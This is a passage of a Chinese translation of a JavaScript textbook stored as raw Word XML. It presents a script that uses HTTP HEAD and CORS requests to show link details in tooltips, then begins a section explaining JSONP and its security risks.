        <w:t>HEAD</w:t>
      </w:r>
      <w:r>
        <w:t>请求按需发起，且由此产生的链接信息会出现在工具提示中。这个示例假设跨域链接的信息不可用，但通过支持</w:t>
      </w:r>
      <w:r>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器尝试下载它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-13</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t>HEAD</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:t>请求链接详细信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*linkdetails.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个常见的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>模块查询有</w:t>
      </w:r>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>属性但没有</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>属性的所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>并给它们注册</w:t>
      </w:r>
      <w:r>
        <w:t>onmouseover</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个事件处理程序使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest HEAD</w:t>
      </w:r>
      <w:r>
        <w:t>请求取得链接资源的详细信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>然后把这些详细信息设置为链接的</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这样它们将会在工具提示中显示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>whenReady(function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>是否有机会使用跨域请求？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var supportsCORS=(new XMLHttpRequest()).withCredentials!==undefined;//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历文档中的所有链接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var links=document.getElementsByTagName('a');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>links.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var link=links[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!link.href)continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过没有超链接的锚点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(link.title)continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过已经有工具提示的链接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果这是一个跨域链接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(link.host!==location.host||link.protocol!==location.protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>link.title="</w:t>
      </w:r>
      <w:r>
        <w:t>站外链接</w:t>
      </w:r>
      <w:r>
        <w:t>";//</w:t>
      </w:r>
      <w:r>
        <w:t>假设我们不能得到任何信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!supportsCORS)continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果没有</w:t>
      </w:r>
      <w:r>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:t>支持就退出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，我们能了解这个链接的更多信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>所以继续前进，注册事件处理程序，于是我们可以尝试</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注册事件处理程序，当鼠标悬停时下载链接详细信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(link.addEventListener)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>link.addEventListener("mouseover",mouseoverHandler,false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>link.attachEvent("onmouseover",mouseoverHandler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function mouseoverHandler(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var link=e.target||e.srcElement;//</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var url=link.href;//</w:t>
      </w:r>
      <w:r>
        <w:t>链接</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var req=new XMLHttpRequest();//</w:t>
      </w:r>
      <w:r>
        <w:t>新请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>req.open("HEAD",url);//</w:t>
      </w:r>
      <w:r>
        <w:t>仅仅询问头信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>req.onreadystatechange=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(req.readyState!==4)return;//</w:t>
      </w:r>
      <w:r>
        <w:t>忽略未完成的请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(req.s</w:t>
      </w:r>
      <w:r>
        <w:t>tatus===200){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果成功</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var type=req.getResponseHeader("Content-Type");//</w:t>
      </w:r>
      <w:r>
        <w:t>获取链接的详细情况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var size=req.getResponseHeader("Content-Length");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var date=req.getResponseHeader("Last-Modified");//</w:t>
      </w:r>
      <w:r>
        <w:t>在工具提示中显示详细信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>link.title="</w:t>
      </w:r>
      <w:r>
        <w:t>类型</w:t>
      </w:r>
      <w:r>
        <w:t>:"+type+"\n"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>大小</w:t>
      </w:r>
      <w:r>
        <w:t>:"+size+"\n"+"</w:t>
      </w:r>
      <w:r>
        <w:t>时间</w:t>
      </w:r>
      <w:r>
        <w:t>:"+date;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>如果请求失败，且链接没有</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>站外链接</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>的工具提示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>那么显示这个错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!link.title)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>link.title="Couldn't fetch details:\n"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>req.status+""+req.statusText;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>req.send(null);//</w:t>
      </w:r>
      <w:r>
        <w:t>移除处理程序：仅想一次获取这些头信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(link.removeEventListener)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>link.removeEventListener("mouseover",mouseoverHandler,fals</w:t>
      </w:r>
      <w:r>
        <w:t>e);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>link.detachEvent("onmouseover",mouseoverHandler);</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58" w:name="18_2_Jie_Zhu__script_Fa_Song_HTTPQing_Qi"/>
      <w:r>
        <w:t>18.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　借助＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞发送</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求：</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="458"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章概述提到过＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素可以作为一种</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>传输机制：只须设置＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性（假如它还没插入到</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>中，需要插入进去），然后浏览器就会发送一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求以下载</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性所指向的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素进行</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>传输的一个主要原因是，它不受同源策略的影响，因此可以使用它们</w:t>
      </w:r>
      <w:r>
        <w:t>从其他的服务器请求数据，第二个原因是包含</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>编码数据的响应体会自动解码（即，执行）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>脚本和安全性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>为了使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素进行</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>传输，必须允许</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面可以执行远程服务器发送过来的任何</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码。这意味着对于不可信的服务器，不应该采取该技术。当与可信的服务器通信时，要提防攻击者可能进入服务器中，然后黑客会接管你的网页，运行他自己的代码，并显示任何他想要的内容，还表现得就像这些内容本就来自你的网站。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，这种方式普遍用于可信的第三方脚本，特别是在页面中嵌入广告和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>组件</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。作为</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>传输使用的＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞与可信的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务通信，没有比这更危险的了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这种使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素作为</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>传输的技术称为</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>，若</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求所得到的响应数据是经过</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>编码的，则适合使用该技术。</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>代表</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>填充</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>前缀</w:t>
      </w:r>
      <w:r>
        <w:t>”——</w:t>
      </w:r>
      <w:r>
        <w:t>这个一会儿再作解释</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>假设你已经写了一个服务，它处理</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求并返回</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>编码的数据。同源的文档可以在代码中使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>，就像例</w:t>
      </w:r>
      <w:r>
        <w:t>18-3</w:t>
      </w:r>
      <w:r>
        <w:t>中的代码一样。假如在服务器上启用了</w:t>
      </w:r>
      <w:r>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:t>，在新的浏览器下，跨域的文档也</w:t>
      </w:r>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>享受到该服务。在不支持</w:t>
      </w:r>
      <w:r>
        <w:t>CROS</w:t>
      </w:r>
      <w:r>
        <w:t>的旧浏览器下，跨域文档只能通过＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素访问这个服务。使用</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>响应数据（理论上）是合法的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaS</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>cript</w:t>
      </w:r>
      <w:r>
        <w:t>代码，当它到达时浏览器将执行它。相反，不使用</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>，而是对</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>编码过的数据解码，结果还是数据，并没有做任何事情。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这就是</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>的意义所在。当通过＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素调用数据时，响应内容必须用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数名和圆括号包裹起来。而不是发送这样一段</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>数据：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[1,2,{"buckle</w:t>
      </w:r>
      <w:r>
        <w:t>":"my shoe"}]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>它会发送这样一个包裹后的</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>响应：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>handleResponse(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[1,2,{"buckle":"my shoe"}]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包裹后的响应会成为＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的内容，它先判断</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>编码后的数据（毕竟就是一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>表达式），然后把它传递给</w:t>
      </w:r>
      <w:r>
        <w:t>handleResponse()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，我们可以假设，文档会拿这些数据做一些有用的事情。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了可行起见，我们必须通过某种方式告诉服务，它正在从一个＜</w:t>
      </w:r>
      <w:r>
